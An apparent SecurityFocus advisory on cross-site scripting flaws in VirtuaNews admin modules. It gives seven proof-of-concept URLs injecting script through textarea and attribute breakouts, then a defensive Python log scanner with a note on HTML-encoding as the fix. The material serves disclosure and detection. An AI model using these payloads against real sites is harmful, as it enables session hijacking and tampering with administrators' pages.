VirtuaSystems VirtuaNews Multiple Module Cross-Site Scripting Vulnerabilities

No exploit is required to leverage this issue. The following proof-of-concept URLs have been provided:

Affecting the 'Vulns' module:
http://www.example.com/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>
http://www.example.com/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')</script>
http://www.example.com/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>

Affecting the 'Files' module:
http://www.example.com/admin.php?action=files&expand="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=files_cat_delete&id="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=files_check&catid="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=newslogo_upload&"><script>alert('XSS')</script>
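
For defenders reviewing web server logs, the following added example (not part of the original advisory and not VirtuaNews code) flags requests to admin.php whose query string carries the attribute-breaking characters seen in the URLs above. It assumes combined-format access logs; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus, parse_qs

# Characters that let input break out of an HTML attribute or <textarea>,
# as every proof-of-concept URL in the advisory does.
BREAKOUT = re.compile(r'[<>"]')
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_admin_requests(log_lines, script="/admin.php"):
    """Return (line_number, action, decoded_query) for each request to
    `script` whose query string contains markup-breaking characters."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if target.path != script:
            continue
        # Inspect the whole decoded query, not only parameter values: some
        # of the advisory's URLs place the markup where a name belongs.
        query = unquote_plus(target.query)
        if BREAKOUT.search(query):
            action = parse_qs(target.query).get("action", ["unknown"])[0]
            hits.append((number, action, query))
    return hits

# Constructed sample log lines (hypothetical hosts and times), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] '
    '"GET /admin.php?action=files&expand=3 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /admin.php?action=files'
    '&expand=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 5180',
    '192.0.2.11 - - [01/Jan/2010:10:00:09 +0000] "GET /admin.php?action=newslogo_upload'
    '&%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 4096',
    '192.0.2.12 - - [01/Jan/2010:10:00:12 +0000] '
    '"GET /index.php?q=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, action, query in suspicious_admin_requests(SAMPLE_LOG):
        print(f"line {number} action={action}: {query}")
```

A hit only records that such a request reached the server. The underlying fix is for the application to HTML-encode request data before writing it into the admin pages.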


 

Copyright 2010, SecurityFocus